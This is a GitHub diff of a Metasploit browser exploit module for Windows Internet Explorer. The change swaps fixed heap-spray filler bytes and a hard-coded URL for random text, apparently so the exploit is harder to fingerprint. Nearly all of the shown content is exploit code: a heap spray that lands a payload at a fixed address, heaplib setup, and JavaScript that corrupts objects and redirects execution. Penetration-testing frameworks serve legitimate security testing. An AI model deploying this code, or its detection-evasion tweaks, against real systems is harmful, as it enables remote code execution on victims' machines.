File tree Expand file tree Collapse file tree 1 file changed +2
-3
lines changed
modules/exploits/windows/browser Expand file tree Collapse file tree 1 file changed +2
-3
lines changed Original file line number Diff line number Diff line change @@ -109,7 +109,7 @@ def get_target(agent)
109109
110110 def ie_heap_spray ( my_target , p )
111111 js_code = Rex ::Text . to_unescape ( p , Rex ::Arch . endian ( target . arch ) )
112- js_nops = Rex ::Text . to_unescape ( " \x0c " * 4 , Rex ::Arch . endian ( target . arch ) )
112+ js_nops = Rex ::Text . to_unescape ( Rex :: Text . rand_text_alpha ( 4 ) , Rex ::Arch . endian ( target . arch ) )
113113
114114 # Land the payload at 0x0c0c0b30
115115 js = %Q|
@@ -125,7 +125,6 @@ def ie_heap_spray(my_target, p)
125125 for (var i=1; i < 0x300; i++) {
126126 heap_obj.alloc(block);
127127 }
128- var overflow = nops.substring(0, 10);
129128 |
130129
131130 js = heaplib ( js , { :noobfu => true } )
@@ -236,7 +235,7 @@ def load_exploit_html(my_target, cli)
236235 arrObject[i].className = unescape("ababababababababababababababababababababa");
237236 }
238237 var eip = window;
239- var data = "https://www.google.com/settings/account ";
238+ var data = "#{ Rex :: Text . rand_text_alpha ( 41 ) }
240239 eip.location = unescape("%u0b30%u0c0c" + data);
241240
242241 }
You can’t perform that action at this time.
0 commit comments